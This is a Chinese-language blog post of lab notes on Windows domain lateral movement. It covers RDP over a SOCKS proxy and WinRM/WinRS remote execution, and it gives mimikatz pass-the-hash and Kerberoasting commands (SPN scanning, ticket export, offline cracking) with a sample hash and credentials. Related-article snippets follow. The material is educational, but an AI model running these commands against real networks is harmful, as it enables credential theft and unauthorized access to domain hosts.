内网横向移动RDP&WinRM&Spn&Kerberos

最新推荐文章于 2024-12-05 15:08:31 发布
最新推荐文章于 2024-12-05 15:08:31 发布
阅读量1k 收藏 11
点赞数 29
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52227682/article/details/144257890
版权

RDP横向移动:

实验1:(通过RDP远程连接内网主机)

实验环境:

概述:远程桌面服务支持明文及HASH连接

使用条件:对方开启RDP服务,远程桌面(3389端口)

RDP连接的三种方式:

1.直接在当前被控主机上进行远程连接(直接在webserver进行远程连接sqlserver)【动作太大了】

2.建立节点进行连接(使用代理工具) 推荐

3.端口转发(将SQLserver 3389端口的流量转发至webserver 2222端口,需要上传工具)【需要上传流量】

先让webserver上线CS,并提权:

对3389端口进行探测:

结果:

做socks代理:

成功连上目标主机域控。

Hash连接:

mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin"        #mimikatz使用HASH连接

WinRM&WinRS横向移动

利用WinRM服务,采用WinRS连接:

WinRM代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。
默认情况下支持Kerberos和NTLM身份验证以及基本身份验证。
使用条件:双方都启用的Winrm rs的服务!
使用此服务需要管理员级别凭据
Windows 2008 以上版本默认自动状态,Windows Vista/win7上必须手动启动;
Windows 2012之后的版本默认允许远程任意主机来管理。

实验1:(winrs命令横向移动)

webserver靶机开启:

winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}

端口扫描域内的5985端口

powershell Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}
连接执行:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami

可以用之前下载web站点木马执行。

也可以利用CS内在winrm64插件进行横向:

Spn&Kerberos横向移动

概述:

Kerberoasting 攻击的利用流程:
•SPN服务发现
•请求服务票据(工具判断与powershell脚本判断)
•服务票据的导出(mimikatz导出)
•服务票据的暴力破解(使用密码字典进行RC4协议破解)

https://github.com/GhostPack/Rubeus
https://github.com/nidem/kerberoast
https://www.freebuf.com/articles/system/174967.html

如需利用需要配置策略加密方式(对比)
黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。
DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能够验证用户是否可以访问。
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。
黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为Kerberoast攻击。
如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。

实验1(Spn&Kerberos破解票据,得到明文密码):

注:这里使用god.org环境做相关实验,仅作演示。

此方法用于无法抓取hash值或者明文密码时使用

使用条件:采用RC4加密类型票据,工具Rubeus检测或看票据加密类型

扫描与环境主机开启的服务:

powershell setspn -T God.org -q */*
powershell setspn -T God.org -q */* | findstr "MSSQL"

2.工具检测可用协议

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.

源码是没有编译的,需要用vs studio执行.sln文件才可以生成rubeus.exe文件

但是这里复现没有成功,暂无发现原因:

检测可用协议-手工:

powershell Add-Type -AssemblyName System.IdentityModel

powershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/WebServer.god.org:1433"

结果又出现这个问题:

按照小迪老师的步骤:

先打开mimikatz:

mimikatz::list

mimikatz::list /export #导出票据:

导出到本地电脑,然后进行破解:

python tgsrepcrack.py pass.txt ''票据名字"

实验失败,记好流程。

sunyarn
关注
内网安全——横向移动-RDP&WinRM&Kerberoast攻击
m0_61506558的博客
02-03 622
请求的Kerberos服务票证的加密类型是RC4_ HMAC_ MD5, 这意味着服务帐户的NTLM密码。如果我们有-一个为域用户帐户注册的任意sPN,那么该用户帐户的明文密码的NTIM哈希值。Dc在活动目录中查找sEN,并使用与sPN关联的服务帐户加密票证,以便服务能够验证用。黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一一个或多个。黑客将收到的rGs票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为。双方都启用的winrm rs的服务,使用此服务需要管理员级别凭据。
内网渗透之横向移动rdp&winrm&winrs&spn&kerberos
m0_62207170的博客
04-24 971
内网渗透之横向移动rdp&winrm&winrs&spn&kerberos
内网渗透—横向移动&RDP&WinRM&WinRS&SPN扫描&Kerberos攻击
2301_76227305的博客
08-14 1310
总的来说RDP基本在现实中不咋用,因为你要去判断连接的账户当前在线不,被发现的风险较大。WinRM的话可能用的比较多,条件是必须为2008以上的系统才行,不过都2024年了,那些2008以下的老古董估计也没谁用了。kerberos攻击简单来说,就是找到RC4加密方式的服务,然后去请求它让本地生成票据,最后使用工具破解得到密码。PS:这个次是实验弄了整整三天,wcnm,各种环境问题。看了一大堆文章也解决不了,实在是不想管啦。以上便是本次横移的知识了。
winRM横向移动
网络安全。
02-15 2322
0x01 winRM简介 WinRM 是 Microsoft 对 WS-Management 协议的实现,WS-Management 协议即一种基于标准简单对象访问协议[SOAP]的 “防火墙友好” 协议,它让来自不同供应商的硬件操作系统能够互相操作。winRM的默认端口为5985(http)或5986(https)。 winRM横向移动同时适用于工作组域环境。 0x02 利用条件 1、在w...
内网横向移动—Kerberos攻击&SPN扫描&WinRM&WinRS&RDP
剁椒鱼头没剁椒的博客
07-24 1304
文章中很多的环境,由于都是自己搭建的,有时候可能会出现无法测试成功的情况,有人问为什么不使用别人搭建好的靶场,主要是懒,不过最关键的是,这些环境太大了,自己的小破机器带不动呀。同时后面的文章很多之前介绍过的操作方式,我就会直接说,而不会像之前一样,一步一步操作,就比如我要设置socks代理,我就只会说,这里需要设置socks代理,而不会在去一步步演示socks代理如何设置。
Windows 横向移动的常用技术
永远都没有了
07-06 2304
横向移动不仅仅是需要收集明文凭据,还需要收集密文凭据,在遇到防火墙受阻端口限制的情况下,我们可以使用建立端口转发稳定的隧道来与目标进行通信,当用户拥有某些权限时,我们也可以扩展危害性,感染其他用户来进行横向移动
内网学习笔记】24、SPN 的应用
TeamsSix 的 优快云 空间
09-07 1319
0、前言 SPN Windows 域环境是基于微软的活动目录服务工作的,它在网络系统环境中将物理位置分散、所属部门不同的用户进行分组集中资源,有效地对资源访问控制权限进行细粒度的分配,提高了网络环境的安全性及网络资源统一分配管理的便利性。 在域环境中运行的大量应用包含了多种资源,为了对资源的合理分类再分配提供便利,微软给域内的每种资源分配了不同的服务主题名称即 SPN (Service Principal Name) Kerberos Kerberos 是由 MIT 提出的一种网络身份验证协议,旨在通过
内网安全之:域环境中的 SPN
f_carey的博客
12-01 5175
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明谐。 域环境中的 SPN1 SPN 简介1.1 SPN分类2 SPN 扫描2.1 SPN 命令格式2.2 SPN 查询2.3 Powershell 下的 SPN 扫描3 SPN 扫描破解TGS Tickets3.1 注册 SPN3.2 请求 SPN Kerberos 票据3.3 导出 SPN Kerberos 票据.
第5章域内横向移动分析及防御
willow_liang的博客
12-26 4163
第5章域内横向移动分析及防御 域内横向移动投不定在夏杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁(Advanced Persistent Threats,APT中。攻击者会利用该技术,以被攻陷的系统为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。 通过此类攻击手段,攻击者最终可能获取域控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施与业务相关的关键账户。因此,必须使用强口令来保护特权用户不被
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1721
通过使用活动目录,管理员能够中心化、批量地更新管理操作系统、应用、用户以及对数据的访问,而用户管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码数据”。
8、内网安全-横向移动&RDP&Kerberos攻击&SPN扫描&WinRM&WinRS
m0_65842464的博客
02-18 1649
一、域横向移动-RDP远程桌面-明文&NTLM;二、域横向移动-WinRM&WinRS-明文&NTLM:WinRM 代表 Windows 远程管理,是一种允许管理员远程执行系统管理任务的服务。默认情况下支持 Kerberos NTLM 身份验证以及基本身份验证。三、域横向移动-Spn&Kerberos-请求&破解&重写
rdp连接工具_横向渗透之 [RDP]
weixin_39928940的博客
11-27 1616
重生信息安全T3ngYu一、RDP 服务确定启动 1. 确定RDP服务是否启动服务端口 (1)注册表查询REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections # 查看RDP服务是否开启:1关闭,0开启 REG QUERY "HKEY_LOCAL_MACH...
内网安全】横向移动&Kerberos攻击&SPN扫描&WinRM&WinRS&RDP
今天是几号的博客
03-29 1253
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能够验证用户是否可以访问。•服务票据的暴力破解(使用密码字典进行RC4协议破解)cs 内置端口扫描3389。
远程桌面条件,远程桌面连接的条件有哪些?
最新发布
m0_72547478的博客
12-05 782
在众多软件中,IIS7服务器管理工具凭借其高效、便捷的特点,脱颖而出,成为众多管理员的首选。IIS7服务器管理工具不仅支持对IIS7及以上版本的服务器进行远程管理,还兼容WindowsServer系列操作系统,为管理员提供了全面的服务器监控与管理功能。3.远程连接:在服务器列表中,双击目标服务器,即可通过远程桌面功能,直接连接到该服务器进行操作。该工具提供有详细的安装指南,用户可轻松完成安装。4.管理操作:连接成功后,用户可以在远程桌面上进行文件传输、系统设置、应用程序部署等操作,实现全面的服务器管理。
横向移动-WINRM
whojoe的博客
05-19 419
横向移动-WINRMWINRM前提远程管理1.winrs2.powershell端口复用参考文章 WINRM WinRM代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。通过HTTP(5985)或HTTPS SOAP(5986)执行通信,默认情况下支持KerberosNTLM身份验证以及基本身份验证。使用此服务需要管理员级别凭据。 前提 双方都要开启winRM,并且可以通信 Windows 2008 以上版本默认自动状态,Windows Vista/win7上必须手动启动;WinRS
RDP凭据获取继续横向
weixin_43227251的博客
05-06 414
RDP凭据获取继续横向 文章目录RDP凭据获取继续横向猕猴桃获取密码network password通过powershell脚本 猕猴桃获取密码 有可能这台机器保存登录其他机器rdp #查看mstsc的连接纪录 cmdkey /list #查找本地的Credentials: dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* 如果存在,可以使用mimikatz 记录这个值 mimikatz.exe "privilege::debug"
WinRM远程管理工具的使用
谢公子的博客
03-28 4746
WinRM WinRM是WindowsRemoteManagementd(windows远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80端口或者443端口。使用WinRM我们就可以在对方有设置防火墙的情况下远程管理这台服务器了。 Server2008R2及往上的系统中默认中都开启该服务,从Server2012系统后开始,该WinRM服务便被设置为默认开启。Win...
Windows远程桌面(RDP)密码凭证获取 (゚益゚メ) 渗透测试
寻觅的博客
03-07 6005
文章目录RDP连接记录MySQL数据库密码破解WiFi密码获取浏览器相关记录其他可造成安全隐患软件NacicatXmangagerTeamview RDP连接记录 MySQL数据库密码破解 WiFi密码获取 浏览器相关记录 其他可造成安全隐患软件 Nacicat Xmangager Teamview ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值